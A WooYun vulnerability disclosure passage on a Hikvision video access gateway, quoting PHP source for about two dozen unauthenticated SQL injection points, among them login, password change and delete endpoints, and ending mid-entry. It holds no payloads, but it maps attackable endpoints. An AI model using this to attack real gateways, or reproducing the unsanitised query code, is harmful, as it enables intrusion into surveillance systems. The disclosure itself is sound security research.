当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0180213

漏洞标题:海康威视某视频接入网关系统漏洞集合(无需登录34处SQL注入&文件遍历&上传等)

相关厂商:海康威视

漏洞作者: YY-2012

提交时间:2016-03-02 19:54

修复时间:2016-06-04 10:00

公开时间:2016-06-04 10:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-02: 细节已通知厂商并且等待厂商处理中
2016-03-06: 厂商已经确认,细节仅向厂商公开
2016-03-09: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

rt

详细说明:

第一处注入:/userInfo/userInfo.php

<?php
include('../common/connDb.php');
include('roleInfoClass.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['userId']);
$userId = "";
$name = "";
$password = "******";
$realName = "";
$phone = "";
$eMail = "";
$roleId = "";
$unitCode = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from user_info where userId ='.$_GET['userId']);
while ($row = $dbQuery->fetchArray($re)){
$userId = $row['userId'];
$name = $row['name'];
//$password = $row['password'];
$realName = $row['realName'];
$phone = $row['phone'];
$eMail = $row['eMail'];
$roleId = $row['roleId'];
$unitCode= $row['unitCode'];


第二处注入:/userInfo/roleInfo.php

<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['roleId']);
$roleId = "";
$name = "";
$description = "";
$menuIds = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from role_info where roleId ='.$_GET['roleId']);
while ($row = $dbQuery->fetchArray($re)){
$roleId = $row['roleId'];
$name = $row['name'];
$description = $row['description'];
$menuIds = $row['menuIds'];
}
}


第三处注入:/data/fetchRoleTreeJson.php

<?php
include('../common/connDb.php');
$type = $_GET['type'];
$pNodeId = @$_GET['pNodeId'];
$dbQuery = new DataBaseQuery();
if($type=="main"){//取主菜单的树
findAllMainMenuNode($dbQuery);
}else{//取子菜单的树
findAllSubMenuNode($dbQuery,$pNodeId);
}
class TreeNode{
var $id;
var $text;
var $iconCls;
var $state;
var $children=array();
function __construct(){

}
public function setId($id)
{
$this->id = $id;
}
public function setText($text)
{
$this->text = $text;
}
public function setIconCls($iconCls)
{
$this->iconCls = $iconCls;
}
public function setState($state)
{
$this->state = $state;
}
public function setChildren($children)
{
$this->children = $children;
}
public function getId()
{
return $this->id;
}
public function getText()
{
return $this->text;
}
public function getIconCls()
{
return $this->iconCls;
}
public function getState()
{
return $this->state;
}
public function getChildren()
{
return $this->children;
}

}
/**
找出主菜单的树节点
*/
function findAllMainMenuNode($dbQuery){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('主菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=1');//查询所有主菜单
while($row = $dbQuery->fetchArray($re)){
$cNode = new TreeNode();
$cNode->setId($row['menuId']);
$cNode->setText($row['name']);
$cNode->setIconCls('icon-systemMenu');
if ($pNode->getChildren() != null) {
$childrenArray = $pNode->getChildren();
array_push($childrenArray,$cNode);
$pNode->setChildren($childrenArray);
}else{
$childrenNodes = array();
array_push($childrenNodes,$cNode);
$pNode->setChildren($childrenNodes);
}
}
print_r(json_encode($jsonArray));
$dbQuery->closeDb();
}
/**
找出子菜单的树节点
*/
function findAllSubMenuNode($dbQuery,$pNodeId){
$jsonArray = array();
$pNode = new TreeNode();
$pNode->setId('0');
$pNode->setText('子菜单');
$pNode->setIconCls('icon-folder');
array_push($jsonArray,$pNode);
$re= $dbQuery->query('select * from menu_info where level=2 and parentMenuId='.$pNodeId);//根据父菜单查询所有子菜单


第四处注入:/deviceConfig/configDeviceInfo.php

<?php
include('../common/connDb.php');
include('deviceTypeClass.php');
$deviceId = $_GET['deviceId'];
$dbQuery = new DataBaseQuery();
$re = $dbQuery->query('select type_code,name from device_type_info');
$deviceTypeArray = array(); //获取所有设备类型
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['type_code'],$row['name']);
array_push($deviceTypeArray,$deviceType);
}
$re = $dbQuery->query('select id,name from device_group_info');
$groupArray = array();
array_push($groupArray,new DeviceType("0","请选择"));
while ($row = $dbQuery->fetchArray($re)){
$deviceType = new DeviceType($row['id'],$row['name']);
array_push($groupArray,$deviceType);
}
$type_code="";
$network_addr="";
$network_port="";
$username="";
$password="******";
$indexcode="";
$name="";
$serial_num="";
$analog_chan_count="";
$digital_chan_count="";
$alarm_in_count="";
$alarm_out_count="";
$audio_num="";
$reg_type="";
$group_id="";
$allowShare="";
$ctrl_unit_id ="";
$re = $dbQuery->query('select * from device_info where id='.$deviceId);


第五处注入:/transformServer/serverConfigInfo.php

<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$isEmpty = empty($_GET['transId']);
$transId = "";
$name = "";
$transIp = "";
$transPort = "";
$transMax = "";
$transType = "";
if(!$isEmpty){
$re = $dbQuery->query('select * from transform_server_info where transform_server_id ='.$_GET['transId']);


第六处注入:/cameraConfig/transferInfo.php

<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$id = $_GET['id'];
$src_audio_encode = "-1";
$src_video_encode = "-1";
$src_standard = "0";
$src_stream_type = "0";
$src_transform = "-1";
$src_image_size = "1";
$dst_audio_encode = "2";
$dst_video_encode = "1";
$dst_stream_type = "0";
$dst_transform = "2";
$dst_bitrate_type = "1";
$dst_resolution = "3";
$dst_video_bitrate = "19";
$dst_framerate = "-1";
$dst_interval_BPframe = "2";
$dst_interval_Iframe = "30";
$dst_pic_quality = "0";
$transform_server_id = "";

$re = $dbQuery->query('select * from camera_info where is_transform=1 and id ='.$id);
while ($row = $dbQuery->fetchArray($re)){


第七处注入:/data/deviceAndCameraListData.php

include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['name'];
[email protected]$_POST['organize'];
[email protected]$_POST['group'];
[email protected]$_POST['configFlag'];
[email protected]$_GET['type'];
$deviceIndexCode = @$_GET['deviceIndexCode'];
$deviceId = @$_GET['deviceId'];
$show = @$_GET['show'];
if($type =="device"){
$whereStr="";
if($name != ""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
}
if($organize != ""){
if($organize =="0"){ //如果是主控制中心则查询全部
}else{
if(strlen($organize)==8){//如果是派出所级别
$whereStr =" and d.indexcode like '".$organize."%'";
}else{
$qxCode = substr($organize,4,2);
$shiCode = substr($organize,2,2);
$shengCode = substr($organize,0,2);
if($shiCode=="00" && $qxCode=="00"){ //如果是省
$whereStr =" and d.indexcode like '".$shengCode."%'";
}else if($shiCode !="00" && $qxCode=="00"){ //如果是市
$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%'";
}else{
$whereStr =" and d.indexcode like '".$organize."%'";
}
}

}
}
if($group != ""){
if($group=="-1"){
}else{
$whereStr =" and d.group_id =".$group;
}
}
$str="";
if($configFlag == "1"){
$str =" and (c.is_transform is null or c.is_transform=0)";
}else if($configFlag == "2"){
$str =" and (c.is_stream_transmit is null or c.is_stream_transmit=0)";
}
$re = $dbQuery->query('select distinct d.id,d.name,d.type_code,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type regType,**.**.**.**work_addr networkAddr,**.**.**.**work_port networkPort,d.status,"device" type,d.indexcode,d.username,d.password from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
$jsonArray = array();


$count = $dbQuery->querySingle('select count(distinct d.id) from device_info d,camera_info c where d.indexcode=c.device_indexcode'.$unitWhere.$whereStr.$str);
while ($row = $dbQuery->fetchArray($re)){
$pNode = new TreeNode();


第8处注入:/data/deviceTypeData.php

<?php	
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from device_type_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from device_type_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第九处注入:/data/checkIsExist.php

<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$object=$_POST['object'];
if($object=="userInfo"){ //如果是校验用户名称
$name=$_POST['name'];
$userId=$_POST['userId'];
checkUserName($dbQuery,$name,$userId);
}else if($object=="roleInfo"){
$name=$_POST['name'];
$roleId=$_POST['roleId'];
checkRoleName($dbQuery,$name,$roleId);
}else if($object=="password"){
$name=$_POST['name'];
$password=$_POST['password'];
checkPassword($dbQuery,$name,$password);
}else if($object=="deviceGroup"){ //如果是校验用户名称
$name=$_POST['name'];
$groupId=$_POST['groupId'];
checkGroupName($dbQuery,$name,$groupId);
}
function checkUserName($dbQuery,$name,$userId){
$count = 0;
if($userId ==""){
$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from user_info where name="'.$name.'" and userId<>'.$userId);
}
echo $count;
$dbQuery->closeDb();
}
function checkRoleName($dbQuery,$name,$roleId){
$count = 0;
if($roleId ==""){
$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from role_info where name="'.$name.'" and roleId<>'.$roleId);
}
echo $count;
$dbQuery->closeDb();
}
function checkPassword($dbQuery,$name,$password){
$oldPassword = $dbQuery->querySingle('select password from user_info where name="'.$name.'"');
if($password ==$oldPassword){
echo 0;
}else{
echo 1;
}
$dbQuery->closeDb();
}
function checkGroupName($dbQuery,$name,$groupId){
$count = 0;
if($groupId ==""){
$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'"');
}else{
$count = $dbQuery->querySingle('select count(*) from device_group_info where name="'.$name.'" and id<>'.$groupId);
}
echo $count;
$dbQuery->closeDb();
}
?>


第十处注入:/data/fetchIoInfoData.php

<?php
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['organize'];
[email protected]$_POST['group'];
[email protected]$_POST['configFlag'];

$re = $dbQuery->query('select c.id,c.name,c.indexcode,d.name deviceName,**.**.**.**work_addr networkAddr,d.indexcode devIndexCode,d.type_code typeCode, c.globe_num from io_info c,device_info d where c.device_indexcode=d.indexcode order by c.id '.$order.' limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from io_info c,device_info d where c.device_indexcode=d.indexcode');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第十一处:/data/saveDeviceType.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
$typeCodes = @$_POST['typeCodes'];
$typeCode= @$_POST['typeCode'];
$name= @$_POST['name'];
$manufacturer= @$_POST['manufacturer'];
$registerType= @$_POST['registerType'];
$accessType= @$_POST['accessType'];
$equipmentType= @$_POST['equipmentType'];
$otherMan= @$_POST['otherMan'];
$port= @$_POST['port'];
if($operate=="delete"){ //如果是删除操作
deleteDeviceType($typeCodes);
}else if($operate=="add"){ //如果是增加操作
saveDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port);
}else{ //如果是修改操作
updateDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port);
}
function deleteDeviceType($typeCodes){
$dbQuery = new DataBaseQuery();
$typeCodeArray = explode(",",$typeCodes);
$codes="";
for($i=0;$i<count($typeCodeArray);$i++){
$count = $dbQuery->querySingle('select count(*) from device_info where type_code='.$typeCodeArray[$i]);
if($count==0){
$codes .=$typeCodeArray[$i].",";
}
}
if(strlen($codes)>0){
$codes = substr($codes,0,strlen($codes)-1);
}
$query = $dbQuery->execute("delete from device_type_info where type_code in(".$codes.")");
if ($query) {
echo $codes;
}else{
echo "0";
}
$dbQuery->closeDb();
}
function saveDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port){
$pulginId="";
if($accessType=="GB28181" || $accessType=="E-home" || $accessType=="Onvif" || $accessType=="Pisa" || $accessType=="Hkp协议"){
$pulginId="";
}else{
$pulginId=$accessType;
}
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('insert into device_type_info(type_code,name,manufacturer,register_type,access_type,equipment_type,plugin_id,update_time,int_rev,str_rev) values('.$typeCode.',"'.$name.'","'.$manufacturer.'",'.$registerType.',"'.$accessType.'","'.$equipmentType.'","'.$pulginId.'","'.$time.'",'.$port.',"'.$otherMan.'")');
if ($query) {
echo $typeCode;
}else{
echo 0;
}
$dbQuery->closeDb();

}
function updateDeviceType($typeCode,$name,$manufacturer,$registerType,$accessType,$equipmentType,$otherMan,$port){
$pulginId="";
if($accessType=="GB28181" || $accessType=="E-home" || $accessType=="Onvif" || $accessType=="Pisa" || $accessType=="Hkp协议"){
$pulginId="";
}else{
$pulginId=$accessType;
}
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute('update device_type_info set name="'.$name.'",manufacturer="'.$manufacturer.'",register_type='.$registerType.',access_type="'.$accessType.'",equipment_type="'.$equipmentType.'",plugin_id="'.$pulginId.'",update_time="'.$time.'",int_rev='.$port.',str_rev="'.$otherMan.'" where type_code='.$typeCode);
if ($query) {
echo $typeCode;
}else{
echo 0;
}
$dbQuery->closeDb();
}
?>


第十二处:/data/saveDecodeServer.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){ //如果是删除操作
$transIds = $_POST['transIds'];
deleteDecodeServer($transIds);
}else{ //如果是增加或者修改操作
$isEmpty=empty($_POST['transId']);
$name=$_POST['name'];
$transIp=$_POST['transIp'];
$transPort=$_POST['transPort'];
$transMax=$_POST['transMax'];
$transType=$_POST['transType'];
if($isEmpty){
saveDecodeServer($name,$transIp,$transPort,$transMax,$transType);
}else{
updateDecodeServer($_POST['transId'],$name,$transIp,$transPort,$transMax,$transType);
}

}
function deleteDecodeServer($transIds){
$dbQuery = new DataBaseQuery();
$query = $dbQuery->execute("delete from transform_server_info where transform_server_id in(".$transIds.")");
if ($query) {
echo "0";
}else{
echo "1";
}
$dbQuery->closeDb();
}
function saveDecodeServer($name,$transIp,$transPort,$transMax,$transType){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute("insert into transform_server_info(transform_server_id,server_ip,server_port,name,trans_type,trans_max,update_time) values (NULL,'".$transIp."',".$transPort.",'".$name."',".$transType.",".$transMax.",'".$time."')");
if ($query) {
echo $dbQuery->lastInsertRowID();
}else{
echo 0;
}
$dbQuery->closeDb();

}
function updateDecodeServer($transId,$name,$transIp,$transPort,$transMax,$transType){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute("update transform_server_info set server_ip='".$transIp."',server_port=".$transPort.",name='".$name."',trans_type=".$transType.",trans_max=".$transMax.",update_time='".$time."' where transform_server_id=".$transId);
if ($query) {
echo $transId;
}else{
echo 0;
}
$dbQuery->closeDb();
}
?>


第十三处:/data/fetchGroup.php

<?php	
/*
根据id找出分组
*/
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$groupId=$_POST['groupId'];
$groupArray = $dbQuery->querySingleRow('select id,name from device_group_info where id='.$groupId,true);
$dbQuery->closeDb();
echo(json_encode($groupArray));
?>


第十四处:/data/login.php

<?php
/**
系统登录设置
*/
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$userName =$_POST['userName'];
$password =$_POST['password'];
$system =$_POST['system'];
$userInfo = $dbQuery->querySingleRow('select password,roleId,unitCode from user_info where name="'.$userName.'"',true);
if(count($userInfo)==0){ //用户名不存在
echo "1";
$dbQuery->closeDb();
return;
}else{ //用户名存在


第十五处:/data/transferCamera.php

<?php
include('../common/connDb.php');
[email protected]$_POST['ids'];
$srcAudioType=$_POST['srcAudioType'];
$srcVideoType=$_POST['srcVideoType'];
$srcStandard=$_POST['srcStandard'];
$srcStreamType=$_POST['srcStreamType'];
$srcTransForm=$_POST['srcTransForm'];
$srcImageSize=$_POST['srcImageSize'];
$dstAudioType=$_POST['dstAudioType'];
$dstVideoType=$_POST['dstVideoType'];
$dstStreamType=$_POST['dstStreamType'];
$dstTransForm=$_POST['dstTransForm'];
$dstBitrateType=$_POST['dstBitrateType'];
$dstResolution=$_POST['dstResolution'];
$dstVideoBitrate=$_POST['dstVideoBitrate'];
$dstFramerate=$_POST['dstFramerate'];
$dstIntervalBPframe=$_POST['dstIntervalBPframe'];
$dstIntervalIframe=$_POST['dstIntervalIframe'];
$dstPicQuality=$_POST['dstPicQuality'];
$transId=$_POST['transId'];
$dbQuery = new DataBaseQuery();
$idArray = explode(",",$ids);
$cameraIds ="";
for($i=0;$i<count($idArray);$i++){
$cameraIds .=$idArray[$i].",";
}
$cameraIds = substr($cameraIds,0,strlen($cameraIds)-1);
$query=$dbQuery->execute('update camera_info set is_transform=1,src_audio_encode='.$srcAudioType.',src_video_encode='.$srcVideoType.',src_standard='.$srcStandard.',src_transform='.$srcTransForm.',dst_audio_encode='.$dstAudioType.',dst_video_encode='.$dstVideoType.',dst_stream_type='.$dstStreamType.',dst_transform='.$dstTransForm.',dst_bitrate_type='.$dstBitrateType.',dst_resolution='.$dstResolution.',dst_video_bitrate='.$dstVideoBitrate.',dst_framerate='.$dstFramerate.',dst_interval_BPframe='.$dstIntervalBPframe.',dst_interval_Iframe='.$dstIntervalIframe.',dst_pic_quality='.$dstPicQuality.',transform_server_id='.$transId.' where id in('.$cameraIds.')');
if($query){
echo "0";
}else{
echo "1";
}
$dbQuery->closeDb();
?>


第十六处:/data/modifyPassword.php

<?php
include('../common/connDb.php');
$name=$_POST['name'];
$modPassword=$_POST['modPassword'];
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
$query = $dbQuery->execute("update user_info set password='".$modPassword."',updataTime='".$time."' where name='".$name."'");
if ($query) {
echo 0;
}else{
echo 1;
}
$dbQuery->closeDb();
?>


第十七处:/data/fetchDeviceByGroupId.php

<?php	
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['groupId'];
[email protected]$_POST['queryStatus'];
[email protected]$_POST['name'];
$whereStr="";
if($queryStatus=="1"){
$whereStr=$whereStr." and (d.is_shared is null or d.is_shared =1)";
}
if($name !=""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =$whereStr." and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
}
$re = $dbQuery->query('select d.id,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.status,d.is_shared shared from device_info d where d.allow_share=0 and d.group_id='.$groupId.$unitWhere.$whereStr.' order by d.'.$sort.' '.$order.' limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from device_info d where d.allow_share=0 and d.group_id='.$groupId.$unitWhere.$whereStr);
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第十八处:/data/deleteDeviceInfo.php

<?php
include('../common/connDb.php');
$deviceIds = @$_POST['deviceIds'];
$dbQuery = new DataBaseQuery();
$dbQuery->execute("delete from camera_info where device_id in(".$deviceIds.")");
$dbQuery->execute("delete from device_info where id in(".$deviceIds.")");
echo "0";
$dbQuery->closeDb();
?>


第十九处:/data/modifyDeviceInfo.php

<?php
include('../common/connDb.php');
$deviceId = @$_POST['deviceId'];
$register = @$_POST['register'];
$typecode = @$_POST['typecode'];
$addr = @$_POST['addr'];
$port = @$_POST['port'];
$username = @$_POST['username'];
$password = @$_POST['password'];
$password_old = @$_POST['password_old'];
$groupId = @$_POST['groupId'];
$oldAddr = @$_POST['oldAddr'];
$oldPort = @$_POST['oldPort'];
$allowShare = @$_POST['allowShare'];
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
if($register=="4"){ //如果是主动注册
$query = $dbQuery->execute('update device_info set type_code='.$typecode.',group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
if ($query) {
echo $deviceId;
}else{
echo 0;
}
}else{
//if($oldAddr != $addr || $oldPort != $port){//如果新的IP或端口不同于老的,则为新的设备,需要删除之前设备中的监控点
// $dbQuery->execute('delete from camera_info where device_id='.$deviceId);
//}
if($password != $password_old){
$query = $dbQuery->execute('update device_info set type_code='.$typecode.',network_addr="'.$addr.'",network_port='.$port.',username="'.$username.'",password="'.$password.'",group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
}
else{
$query = $dbQuery->execute('update device_info set type_code='.$typecode.',network_addr="'.$addr.'",network_port='.$port.',username="'.$username.'",group_id='.$groupId.',allow_share='.$allowShare.',update_time="'.$time.'" where id='.$deviceId);
}
if ($query) {
echo $deviceId;
}else{
echo 0;
}
}
$dbQuery->closeDb();
?>


第二十处:/data/decodeServerData.php

<?php	
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from transform_server_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from transform_server_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第二十一处:/data/userInfoData.php

<?php	
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$start=($page -1)*$rows;
$re = $dbQuery->query('select * from user_info limit '.$start.','.$rows);
$count = $dbQuery->querySingle('select count(*) from user_info');
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$row['unitCode']=fetchUnitName($row['unitCode']);
$jsonStr = $jsonStr.json_encode($row).",";
}


第二十二处:/data/checkDevice.php

<?php
include('../common/connDb.php');
$dbQuery = new DataBaseQuery();
$type=$_POST['type'];
if($type=="singleIp"){ //如果是单IP设备添加
$singleIp_addr=$_POST['singleIp_addr'];
$singleIp_port=$_POST['singleIp_port'];
checkSingleIp($dbQuery,$singleIp_addr,$singleIp_port);
}else if($type=="ipDomain"){ //如果是IP段设备添加
$ipDomain_startIp=$_POST['ipDomain_startIp'];
$ipDomain_endIp=$_POST['ipDomain_endIp'];
$ipDomain_port=$_POST['ipDomain_port'];
checkIpDomain($dbQuery,$ipDomain_startIp,$ipDomain_endIp,$ipDomain_port);
}else if($type=="singleCode"){//如果是单编号设备添加
$singleCode_indexcode=$_POST['singleCode_indexcode'];
checkSingleCode($dbQuery,$singleCode_indexcode);
}else{//如果是编号段设备添加
$codeDomain_preIndexCode=$_POST['codeDomain_preIndexCode'];
$codeDomain_startCode=$_POST['codeDomain_startCode'];
$codeDomain_endCode=$_POST['codeDomain_endCode'];
checkCodeDomain($dbQuery,$codeDomain_preIndexCode,$codeDomain_startCode,$codeDomain_endCode);
}
function checkSingleIp($dbQuery,$singleIp_addr,$singleIp_port){
$count = $dbQuery->querySingle('select count(*) from device_info where network_addr="'.$singleIp_addr.'" and network_port='.$singleIp_port);
echo $count;
$dbQuery->closeDb();
}


第二十三处:/data/deviceListData.php

<?php	
include('../common/connDb.php');
include('../common/unitCode.php');
$dbQuery = new DataBaseQuery();
$page=$_POST['page'];
$rows=$_POST['rows'];
$sort=$_POST['sort'];
$order=$_POST['order'];
$start=($page -1)*$rows;
[email protected]$_POST['name'];
[email protected]$_POST['organize'];
[email protected]$_POST['group'];
$whereStr="";
if($name != ""){
if($name=="." || $name=="%" || $name=="_"){
$name ="[".$name."]";
}
$whereStr =" and (d.name like '%".$name."%' or **.**.**.**work_addr like '%".$name."%')";
}
if($organize != ""){
if($organize =="0"){ //如果是主控制中心则查询全部
}else{
if(strlen($organize)==8){//如果是派出所级别
$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
}else{
$qxCode = substr($organize,4,2);
$shiCode = substr($organize,2,2);
$shengCode = substr($organize,0,2);
if($shiCode=="00" && $qxCode=="00"){ //如果是省
$whereStr =" and d.indexcode like '".$shengCode."%' and d.ctrl_unit_id<>1";
}else if($shiCode !="00" && $qxCode=="00"){ //如果是市
$whereStr =" and d.indexcode like '".$shengCode.$shiCode."%' and d.ctrl_unit_id<>1";
}else{
$whereStr =" and d.indexcode like '".$organize."%' and d.ctrl_unit_id<>1";
}
}

}
}
if($group != ""){
if($group=="-1"){
}else{
$whereStr =" and d.group_id =".$group;
}
}
$re = $dbQuery->query('select d.id,d.indexcode,d.dev_guid devGuid,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.analog_chan_count,d.digital_chan_count,d.alarm_in_count,d.alarm_out_count,(select name from device_group_info where id=d.group_id) groupName,d.status,d.type_code typeCode from device_info d where 1=1 '.$unitWhere.$whereStr.' order by '.$sort.' '.$order.' limit '.$start.','.$rows);
//echo 'select d.id,d.indexcode,d.dev_guid devGuid,d.name,(select name from device_type_info where type_code = d.type_code) deviceType,d.reg_type,**.**.**.**work_addr,**.**.**.**work_port,d.analog_chan_count,d.digital_chan_count,d.alarm_in_count,d.alarm_out_count,(select name from device_group_info where id=d.group_id) groupName,d.status,d.type_code typeCode from device_info d where 1=1 '.$unitWhere.$whereStr.' order by '.$sort.' '.$order.' limit '.$start.','.$rows;
$count = $dbQuery->querySingle('select count(*) from device_info d where 1=1'.$unitWhere.$whereStr);
$jsonStr ="";
while ($row = $dbQuery->fetchArray($re)){
$jsonStr = $jsonStr.json_encode($row).",";
}
if($jsonStr !=""){
$jsonStr = substr($jsonStr,0,strlen($jsonStr)-1);
}
$str ='{"total":'.$count.',"rows":['.$jsonStr.']}';
$dbQuery->closeDb();
echo ($str);
?>


第二十四处:/data/saveUserInfo.php

<?php
include('../common/connDb.php');
$operate=$_POST['operate'];
if($operate=="delete"){ //如果是删除操作
$userIds = $_POST['userIds'];
deleteUserInfo($userIds);
}else{ //如果是增加或者修改操作
$isEmpty=empty($_POST['userId']);
$name=$_POST['name'];
$password = $_POST['password'];
$password_old = @$_POST['password_old'];
$realName = $_POST['realName'];
$phone = $_POST['phone'];
$eMail = $_POST['eMail'];
$roleId = $_POST['roleId'];
$unitCode = $_POST['unitCode'];
if($isEmpty){
saveUserInfo($name,$password,$realName,$phone,$eMail,$roleId,$unitCode);
}else{
updateUserInfo($_POST['userId'],$name,$password,$realName,$phone,$eMail,$roleId,$unitCode);
}

}
function deleteUserInfo($userIds){
$dbQuery = new DataBaseQuery();
$query = $dbQuery->execute("delete from user_info where userId in(".$userIds.")");
if ($query) {
echo "0";
}else{
echo "1";
}
$dbQuery->closeDb();
}
function saveUserInfo($name,$password,$realName,$phone,$eMail,$roleId,$unitCode){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
if($password != $password_old){
$query = $dbQuery->execute('insert into user_info values (NULL,"'.$name.'","'.$password.'","'.$unitCode.'","'.$realName.'","'.$phone.'","'.$eMail.'",'.$roleId.',"'.$time.'","1")');
}
else{
$query = $dbQuery->execute('insert into user_info values (NULL,"'.$name.'","","'.$unitCode.'","'.$realName.'","'.$phone.'","'.$eMail.'",'.$roleId.',"'.$time.'","1")');
}
if ($query) {
echo $dbQuery->lastInsertRowID();
}else{
echo 0;
}
$dbQuery->closeDb();

}
function updateUserInfo($userId,$name,$password,$realName,$phone,$eMail,$roleId,$unitCode){
$dbQuery = new DataBaseQuery();
date_default_timezone_set('PRC');
$time = date('Y-m-d H:i:s',time());
if($password != $password_old){
